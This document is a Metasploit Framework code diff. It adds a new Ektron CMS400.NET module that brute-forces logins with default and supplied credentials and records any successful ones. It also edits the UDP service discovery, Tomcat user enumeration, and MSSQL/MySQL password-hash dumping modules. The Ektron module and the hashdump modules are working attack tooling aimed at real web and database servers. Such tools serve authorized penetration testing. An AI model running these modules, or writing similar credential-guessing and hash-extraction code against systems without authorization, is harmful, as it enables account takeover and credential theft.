@@ -273,20 +368,25 @@ def parse_reply(pkt)
inf = snmp_info
com = snmp_comm
+ @results[hkey] = true
+
when 5093
app = 'Sentinel'
-
+ @results[hkey] = true
+
when 523
-
app = 'ibm-db2'
inf = db2disco_parse(pkt[0])
-
+ @results[hkey] = true
+
when 1604
app = 'citrix-ica'
return unless citrix_parse(pkt[0])
+ @results[hkey] = true
end
+ return unless inside_workspace_boundary?(pkt[1])
report_service(
:host => pkt[1],
:mac => (maddr and maddr != '00:00:00:00:00:00') ? maddr : nil,
@@ -299,7 +399,6 @@ def parse_reply(pkt)
)
print_status("Discovered #{app} on #{pkt[1]}:#{pkt[2]} (#{inf})")
-
end
#
@@ -448,7 +547,14 @@ def probe_pkt_citrix(ip) # Server hello packet from citrix_published_bruteforce
"\x00\x00\x00\x00"
return [data, 1604]
end
-
+
+ def probe_pkt_pca_st(ip)
+ return ["ST", 5632]
+ end
+
+ def probe_pkt_pca_nq(ip)
+ return ["NQ", 5632]
+ end
end
161 modules/auxiliary/scanner/http/ektron_cms400net.rb
View
@@ -0,0 +1,161 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::AuthBrute
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Ektron CMS400.NET Default Password Scanner',
+ 'Description' => %q{
+ Ektron CMS400.NET is a web content management system based on .NET.
+ This module tests for installations that are utilizing default
+ passwords set by the vendor. Additionally, it has the ability
+ to brute force user accounts. Note that Ektron CMS400.NET, by
+ default, enforces account lockouts for regular user account
+ after a number of failed attempts.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => ['Justin Cacak']
+ ))
+
+ register_options(
+ [
+ #Set to false to prevent account lockouts - it will!
+ OptBool.new('BLANK_PASSWORDS', [false, "Try blank passwords for all users", false]),
+ OptString.new('URI', [true, "Path to the CMS400.NET login page", '/WorkArea/login.aspx']),
+ OptPath.new(
+ 'USERPASS_FILE',
+ [
+ false,
+ "File containing users and passwords",
+ File.join(Msf::Config.install_root, "data", "wordlists", "cms400net_default_userpass.txt")
+ ])
+ ], self.class)
+ end
+
+ def target_url
+ #Function to display correct protocol and host/vhost info
+ if rport == 443 or ssl
+ proto = "https"
+ else
+ proto = "http"
+ end
+
+ if vhost != ""
+ "#{proto}://#{vhost}:#{rport}#{datastore['URI'].to_s}"
+ else
+ "#{proto}://#{rhost}:#{rport}#{datastore['URI'].to_s}"
+ end
+ end
+
+ def run_host(ip)
+ begin
+ res = send_request_cgi(
+ {
+ 'method' => 'GET',
+ 'uri' => datastore['URI']
+ }, 20)
+
+ #Check for HTTP 200 response.
+ #Numerous versions and configs make if difficult to further fingerprint.
+ if (res.code == 200)
+ print_status("Ektron CMS400.NET install found at #{target_url} [HTTP 200]")
+
+ #Gather __VIEWSTATE and __EVENTVALIDATION from HTTP response.
+ #Required to be sent based on some versions/configs.
+ begin
+ viewstate = res.body.scan(/<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="(.*)"/)[0][0]
+ rescue
+ viewstate = ""
+ end
+
+ begin
+ eventvalidation = res.body.scan(/<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="(.*)"/)[0][0]
+ rescue
+ eventvalidation = ""
+ end
+
+ GetVersion()
+
+ print_status "Testing passwords at #{target_url}"
+ each_user_pass { |user, pass|
+ do_login(user, pass, viewstate, eventvalidation)
+ }
+ else
+ print_error("Ektron CMS400.NET login page not found at #{target_url}. May need to set VHOST or RPORT. [HTTP #{res.code}]")
+ end
+
+ rescue
+ print_error ("Ektron CMS400.NET login page not found at #{target_url} [HTTP #{res.code}]")
+ return
+ end
+ end
+
+ def GetVersion
+ #Attempt to retrieve the version of CMS400.NET installed.
+ #Not always possible based on version/config.
+ payload = "http://#{vhost}:#{rport}/WorkArea/java/ektron.site-data.js.ashx"
+ res = send_request_cgi(
+ {
+ 'method' => 'GET',
+ 'uri' => payload
+ }, 20)
+
+ if (res.body.match(/Version.:.(\d{1,3}.\d{1,3})/))
+ print_status "Ektron CMS400.NET version: #{$1}"
+ end
+ end
+
+ def do_login(user=nil, pass=nil, viewstate=viewstate, eventvalidation=eventvalidation)
+ vprint_status("#{target_url} - Trying: username:'#{user}' with password:'#{pass}'")
+
+ post_data = "__VIEWSTATE=#{Rex::Text.uri_encode(viewstate.to_s)}"
+ post_data << "&__EVENTVALIDATION=#{Rex::Text.uri_encode(eventvalidation.to_s)}"
+ post_data << "&username=#{Rex::Text.uri_encode(user.to_s)}"
+ post_data << "&password=#{Rex::Text.uri_encode(pass.to_s)}"
+
+ begin
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => datastore['URI'],
+ 'data' => post_data,
+ }, 20)
+
+ if (res and res.code == 200 and res.body.to_s.match(/LoginSuceededPanel/i) != nil)
+ print_good("#{target_url} [Ektron CMS400.NET] Successful login: '#{user}' : '#{pass}'")
+ report_auth_info(
+ :host => rhost,
+ :port => rport,
+ :sname => 'http',
+ :user => user,
+ :pass => pass,
+ :proof => "WEBAPP=\"Ektron CMS400.NET\", VHOST=#{vhost}",
+ :source_type => "user_supplied",
+ :duplicate_ok => true,
+ :active => true
+ )
+
+ elsif(res and res.code == 200)
+ vprint_error("#{target_url} [Ekton CMS400.NET] - Failed login as: '#{user}'")
+ else
+ print_error("#{target_url} [Error] Unable to authenticate. Check parameters. [HTTP #{res.code}]")
+ return :abort
+ end
+
+ rescue ::Rex::ConnectionError => e
+ vprint_error("http://#{tartget_url} - #{e.to_s}")
+ return :abort
+ end
+
+ end
+
+end
2  modules/auxiliary/scanner/http/tomcat_enum.rb
View
@@ -48,7 +48,7 @@ def initialize
Opt::RPORT(8080),
OptString.new('URI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
OptPath.new('USER_FILE', [ true, "File containing users, one per line",
- File.join(Msf::Config.install_root, "data", "wordlists", "unix_users.txt") ]),
+ File.join(Msf::Config.install_root, "data", "wordlists", "tomcat_mgr_default_users.txt") ]),
], self.class)
deregister_options('PASSWORD','PASS_FILE','USERPASS_FILE','STOP_ON_SUCCESS','BLANK_PASSWORDS','USERNAME')
63 modules/auxiliary/scanner/mssql/mssql_hashdump.rb
View
@@ -30,7 +30,7 @@ def initialize
This module also saves information about the server version and
table names, which can be used to seed the wordlist.
},
- 'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
+ 'Author' => ['TheLightCosine <thelightcosine[at]metasploit.com>'],
'License' => MSF_LICENSE
)
end
@@ -48,60 +48,13 @@ def run_host(ip)
version = mssql_query(mssql_sql_info())[:rows][0][0]
version_year = version.split('-')[0].slice(/\d\d\d\d/)
- #Grab all the DB schema and save it as notes
- mssql_db_names = get_db_names()
- mssql_schema={}
- unless mssql_db_names.nil?
- mssql_db_names.each do |dbname|
- tmp_tblnames = get_tbl_names(dbname[0])
- unless tmp_tblnames.nil?
- mssql_schema[dbname]=[]
- tmp_tblnames.each{|tblname| mssql_schema[dbname] << tblname[0] unless tblname[0].nil?}
- end
- end
- end
mssql_hashes = mssql_hashdump(version_year)
- report_other_data(mssql_schema,{'InstanceName' => instancename, 'Version' => version} ,version_year)
unless mssql_hashes.nil?
report_hashes(mssql_hashes,version_year)
end
end
- def report_other_data(mssql_schema,instancename,version_year)
-
- unless mssql_schema.nil?
- report_note(
- :host => rhost,
- :type => "mssql.schema",
- :data => mssql_schema,
- :port => rport,
- :proto => 'tcp',
- :update => :unique_data
- )
- end
-
- unless instancename.nil?
- report_note(
- :host => rhost,
- :type => "mssql.instancename",
- :data => instancename
- )
-
- end
-
- unless version_year.nil?
- report_note(
- :host => rhost,
- :type => "mssql.version_year",
- :data => version_year,
- :port => rport,
- :proto => 'tcp',
- :update => :unique_data
- )
- end
-
- end
#Stores the grabbed hashes as loot for later cracking
#The hash format is slightly different between 2k and 2k5/2k8
@@ -161,20 +114,6 @@ def mssql_hashdump(version_year)
end
- #Gets all of the Databases on this Instance
- def get_db_names
- results = mssql_query(mssql_db_names())[:rows]
- return results
- end
-
- #Gets all the table names for the given DB
- def get_tbl_names(db_name)
- results = mssql_query("SELECT name FROM #{db_name}..sysobjects WHERE xtype = 'U'")[:rows]
- return results
- end
-
-
-
end
50 modules/auxiliary/scanner/mysql/mysql_hashdump.rb
View
@@ -26,7 +26,7 @@ def initialize
This module extracts the usernames and encrypted password
hashes from a MySQL server and stores them for later cracking.
},
- 'Author' => ['TheLightCosine <thelightcosine[at]gmail.com>'],
+ 'Author' => ['TheLightCosine <thelightcosine[at]metasploit.com>'],
'License' => MSF_LICENSE
)
end
@@ -69,21 +69,7 @@ def run_host(ip)
report_hashes(tbl.to_csv, this_service) unless tbl.rows.empty?
- #Recursively grab the schema for the entire DB server
- mysql_schema={}
- res = mysql_query("show databases")
- if res.size > 0
- res.each do |row|
- next if row[0].nil?
- next if row[0].empty?
- next if row[0]== "information_schema"
- next if row[0]== "mysql"
- next if row[0]== "performance_schema"
- next if row[0]== "test"
- mysql_schema[row[0]]= get_tbl_names(row[0])
- end
- end
- report_other_data(mysql_schema)
+
end
#Stores the Hash Table as Loot for Later Cracking
@@ -95,37 +81,5 @@ def report_hashes(hash_loot,service)
end
- #Gets all of the Tables names inside the given Database
- def get_tbl_names(dbname)
-
- tables=[]
- res = mysql_query("SHOW tables from #{dbname}")
- if res.size > 0
- res.each do |row|